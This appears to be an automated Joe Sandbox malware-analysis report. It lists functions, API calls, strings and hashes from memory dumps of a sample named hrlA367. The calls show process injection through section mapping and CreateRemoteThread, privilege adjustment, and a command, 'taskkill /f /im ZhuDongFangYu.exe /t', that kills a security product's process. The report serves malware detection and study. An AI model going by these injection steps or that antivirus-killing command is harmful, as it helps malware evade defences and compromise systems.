Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\krktVt$\BaseNamedObjects\krktVt$csrs
API String ID: 3017432202-347219270
Opcode ID: 9a339cd436d9dcaabdfac7e0ef4a3ddf49aaf66cc73df8b107168bbacab3095e
Instruction ID: ab43ec103d91c20fb762d4f2d0bd0909c8bf0e1cd49eb0996e426fc676339bad
Opcode Fuzzy Hash: 9a339cd436d9dcaabdfac7e0ef4a3ddf49aaf66cc73df8b107168bbacab3095e
Instruction Fuzzy Hash: 92B1CF31604215FFEB319F25ED0ABAA3BA9FF45314F40002AE9089E181C7F99F45CB69

Function 006205F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 006205AD
GetModuleHandleA.KERNEL32(006205EC), ref: 006205F2
lstrcpyW.KERNEL32(\BaseNamedObjects\krktVt,\BaseNamedObjects\krktVt,?,?,?,?), ref: 0062070A
lstrcpyW.KERNEL32(\BaseNamedObjects\krktVt,?), ref: 0062072D
lstrcatW.KERNEL32(\BaseNamedObjects\krktVt,\krktVt), ref: 0062073B
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 0062076B
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00620786
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006207C9
Process32First.KERNEL32 ref: 006207DC
Process32Next.KERNEL32 ref: 006207ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00620805
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00620842
CloseHandle.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 0062085D
CloseHandle.KERNEL32 ref: 0062086C

Strings

\BaseNamedObjects\krktVt, xrefs: 00620708
\BaseNamedObjects\krktVt, xrefs: 00620709, 0062072C, 0062073A
csrs, xrefs: 0062082C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\krktVt$\BaseNamedObjects\krktVt$csrs
API String ID: 1545766225-347219270
Opcode ID: 57f894cdfc26879085bf4d227c0781f2b86f7acd2af6685888add29e9757d882
Instruction ID: 0c1df76fe7d731215c3ff0e0b7db9cb95728a89a8d29f74c0954788d009010a9
Opcode Fuzzy Hash: 57f894cdfc26879085bf4d227c0781f2b86f7acd2af6685888add29e9757d882
Instruction Fuzzy Hash: 0C71AC31505529FFEB219F10EC4ABAE3BAEEF45311F100028F909AE192C7B59F459F69

Function 004222F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(?), ref: 004222AD
GetModuleHandleA.KERNEL32(004222EC), ref: 004222F2
lstrcpyW.KERNEL32(\BaseNamedObjects\krktVt,\BaseNamedObjects\krktVt,?,?,?,?), ref: 0042240A
lstrcpyW.KERNEL32(\BaseNamedObjects\krktVt,?), ref: 0042242D
lstrcatW.KERNEL32(\BaseNamedObjects\krktVt,\krktVt), ref: 0042243B
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 0042246B
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00422486
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 004224C9
Process32First.KERNEL32 ref: 004224DC
Process32Next.KERNEL32 ref: 004224ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00422505
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00422542
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 0042255D
CloseHandle.KERNEL32 ref: 0042256C

Strings

\BaseNamedObjects\krktVt, xrefs: 00422409, 0042242C, 0042243A
csrs, xrefs: 0042252C
\BaseNamedObjects\krktVt, xrefs: 00422408

Memory Dump Source

Source File: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\krktVt$\BaseNamedObjects\krktVt$csrs
API String ID: 1545766225-347219270
Opcode ID: 57f894cdfc26879085bf4d227c0781f2b86f7acd2af6685888add29e9757d882
Instruction ID: 3c9358d8d222a599120c2d10c72e25c251bd3198cb915bbaa848e733c4282ddf
Opcode Fuzzy Hash: 57f894cdfc26879085bf4d227c0781f2b86f7acd2af6685888add29e9757d882
Instruction Fuzzy Hash: 7C71CC31200215FFEB20AF11ED0ABAE3B6DEF44315F90402AE9099E191C7F99F45DB69

Function 0062116F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 347
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00621162,00620796,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 0062116F

Part of subcall function 00621196: GetProcAddress.KERNEL32(00000000,00621180), ref: 00621197

Strings

\krktVt, xrefs: 006211C6

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: \krktVt
API String ID: 2574300362-2624516082
Opcode ID: b3d31ded32db33cd3ae954c65ddfb718b03c4fc3f7067655557bcd1aa46c43b3
Instruction ID: f6b39b0716105c9636956b78a380bf725fc2df5302bcfb6971b735261a2162f4
Opcode Fuzzy Hash: b3d31ded32db33cd3ae954c65ddfb718b03c4fc3f7067655557bcd1aa46c43b3
Instruction Fuzzy Hash: 71A1AB21C4DEB19BC731EA70A8595EE7FA7EB33751708014EE4A08FB42C661CE438E81

Function 004241AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
stringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\krktVt), ref: 004241BA
lstrlenW.KERNEL32(?), ref: 004241C1
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00424216

Strings

\BaseNamedObjects\krktVt, xrefs: 004241B8

Memory Dump Source

Source File: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\krktVt
API String ID: 2597515329-3192795942
Opcode ID: cf07b347a0e0c1752a31311e41616237b242cbc7e37ea3d0786b3fde4713166c
Instruction ID: 5581d7c1f524575fc82b5bcc0b50f8a90625ae7a2541484ae94f258f7c10a4df
Opcode Fuzzy Hash: cf07b347a0e0c1752a31311e41616237b242cbc7e37ea3d0786b3fde4713166c
Instruction Fuzzy Hash: 510181B0781304BAF7309B29CC4BF5F7929DFC1B50F908558F608AE1C4DAB89A0483A9

Function 0062252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenSection.NTDLL(?,0000000E), ref: 0062255E

Strings

\BaseNamedObjects\krktVt, xrefs: 0062254B

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: OpenSection
String ID: \BaseNamedObjects\krktVt
API String ID: 1950954290-3192795942
Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278

Function 00622574 Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0062252F: NtOpenSection.NTDLL(?,0000000E), ref: 0062255E

NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 006225A4
CloseHandle.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00620815), ref: 006225AC

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: Section$CloseHandleOpenView
String ID:
API String ID: 2731707328-0
Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction ID: fb11ac53935d8031ec5bad1668b5c05ae43543006b902a121762c3944df32a90
Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction Fuzzy Hash: 2F211D71300957BBDB24EE25ECA6FE9736AAF80744F40411CF8199E2D4DFB1AE14CA18

Function 00621422 Relevance: 3.0, APIs: 2, Instructions: 38
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 0062145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 0062146A

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4

Function 00622477 Relevance: 3.0, APIs: 2, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 0062249B
NtWriteVirtualMemory.NTDLL ref: 006224A4

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ProtectWrite
String ID:
API String ID: 151266762-0
Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A

Function 0062144A Relevance: 3.0, APIs: 2, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 0062145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 0062146A

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5

Function 004029E0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 88
windowprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#4710.MFC42 ref: 004029EA
SendMessageA.USER32(?,00000080,00000001,?), ref: 00402A04
SendMessageA.USER32(?,00000080,00000000,?), ref: 00402A15
SetWindowLongA.USER32(?,000000EC,00000080), ref: 00402A2A
#6197.MFC42(00000000,0000009C,0000009C,00000000,00000000,00000001), ref: 00402A3E
WinExec.KERNEL32(taskkill /f /im ZhuDongFangYu.exe /t,00000000), ref: 00402A5D

Part of subcall function 00402B40: LoadLibraryA.KERNEL32(kernel32.dll,00000047), ref: 00402BF5
Part of subcall function 00402B40: GetProcAddress.KERNEL32(00000000), ref: 00402BFC
Part of subcall function 00402B40: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402C1F
Part of subcall function 00402B40: strncmp.MSVCRT ref: 00402C44

ExitProcess.KERNEL32 ref: 00402AC4

Strings

100200, xrefs: 00402A71, 00402AA7
100200, xrefs: 00402A9D
|7@, xrefs: 00402A8E
100200, xrefs: 00402AA2
taskkill /f /im ZhuDongFangYu.exe /t, xrefs: 00402A58

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: MessageSend$#4710#6197AddressDirectoryExecExitLibraryLoadLongProcProcessSystemWindowstrncmp
String ID: 100200$100200$100200$taskkill /f /im ZhuDongFangYu.exe /t$|7@
API String ID: 3614577793-2301931671
Opcode ID: e673e02340e5bd4efe8e554bec7010853af1fda679b9e67aa24c048e2f3451a8
Instruction ID: 36d68f4db7c25d412b264195875051be24fd626328578f2d4964cd317598fecc
Opcode Fuzzy Hash: e673e02340e5bd4efe8e554bec7010853af1fda679b9e67aa24c048e2f3451a8
Instruction Fuzzy Hash: 6E11B4307407107BD730AB659E0AF5B77A8BB44B04F10462EFA85B72C1CFF8A8048A5C

Function 006207AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62
processthreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0062144A: LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 0062145A
Part of subcall function 0062144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 0062146A

CloseHandle.KERNELBASE(?), ref: 006205AD
FreeLibrary.KERNELBASE(76DA0000,?,0062079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006207B8
CloseHandle.KERNELBASE(?,?,0062079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006207BF
